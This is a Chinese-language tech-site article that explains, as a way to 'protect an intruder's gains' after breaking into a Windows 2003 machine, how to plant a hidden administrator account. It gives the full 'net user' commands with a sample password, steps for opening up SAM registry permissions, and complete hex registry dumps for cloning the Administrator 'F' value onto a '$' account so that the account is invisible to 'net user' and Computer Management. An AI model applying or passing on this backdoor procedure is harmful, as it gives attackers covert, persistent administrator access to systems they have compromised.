當電腦系統被成功入侵時,為了保護入侵者的成功果實,通常都會建立一個隱藏的系統帳戶,那么windows 2003開啟隱藏賬號的方法有哪些呢?今天就讓錯新技術頻道小編帶大家一起來了解一下吧!
windows 2003開啟隱藏賬號的方法
當登陸進3389以后--
先建立 cnlnfjhh$ 用戶
c:////>net user cnlnfjhh$ wrsky /add
//后面加$ 是為了使在 控制臺下用 net user 看不到.
然后運行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE////SAM////SAM 點擊它 ,然后在菜單///"安全///"->///"權限///" 添加自己現在登錄的帳戶或組,
把///"權限///"->///"完全控制///"->///"允許///"打上勾,然后確定.
這樣就可以直接讀取本地sam的信息
現在運行regedit.exe
打開鍵 HKEY_LOCAL_MAICHINE////SAM////SAM////Domains////account////user////names////cnlnfjhh$
查看默認鍵值為///"0x3f1///" 相應導出如下
HKEY_LOCAL_MAICHINE////SAM////SAM////Domains////account////user////names////cnlnfjhh$ 為cnlnfjhh$.reg
HKEY_LOCAL_MACHINE////SAM////SAM////Domains////Account////Users////000003F1 為 3f1.reg
HKEY_LOCAL_MACHINE////SAM////SAM////Domains////Account////Users////000001F4 為 lf4.reg (Administrators的相應鍵)
用記事本打開lf4.reg 找到如下的///"F///"的值,比如這個例子中如下
///"F///"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,////
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,////
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,////
00,00,00,00,00,00,00
把其復制后,打開3f1.reg,找到///"F///"的值,將其刪除,然后把上面的那段粘貼.
打開aspnet$.reg,把里面的內容,比如這個例子中如下面這段復制
[HKEY_LOCAL_MACHINE////SAM////SAM////Domains////Account////Users////Names////cnlnfjhh$]
@=hex(3f1):
回到3f1.reg 粘貼上面這段到文件最后,最后生成的文件內容如下
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE////SAM////SAM////Domains////Account////Users////000003F1]
///"F///"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,////
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,////
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,////
00,00,00,00,00,00,00
///"V///"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,////
00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,////
14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,////
01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,////
00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,////
00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,////
08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,////
00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,////
00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,////
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,////
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,////
00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,////
00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,////
00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,////
00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,////
e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,////
00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,////
00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,////
4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,////
76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,////
ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,////
fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,////
37,f1,02,cf,01,00,01,00,01,00,01,00
[HKEY_LOCAL_MACHINE////SAM////SAM////Domains////Account////Users////Names////cnlnfjhh$]
@=hex(3f1):
保存后,將cnlnfjhh$用戶刪除
c:////>net user cnlnfjhh$ /delete
運行regedit.exe 將我們已經修改好的3f1.reg文件導入.
最后,打開regedt32.exe 找到HKEY_LOCAL_MAICHINE////SAM////SAM 點擊它 ,然后在菜單///"安全///"->///"權限///" 刪除剛才添加的帳號
然后 注銷當前用戶 用 cnlnfjhh/wrsky 登陸 就會是 最高權限了.
03克隆的方法和 2000的克隆 略有點區別 就是我文章的那前一部分.
這樣就建立了一個在控制臺用 net user 和///"計算機管理///"中都看不到的帳戶cnlnfjhh$, 記著第一次就把密碼設置好,不要改密碼
上文是關于windows 2003開啟隱藏賬號的方法,相信大家都有了一定的了解,想要了解更多的電腦知識,請繼續關注錯新技術頻道吧!
新聞熱點
疑難解答
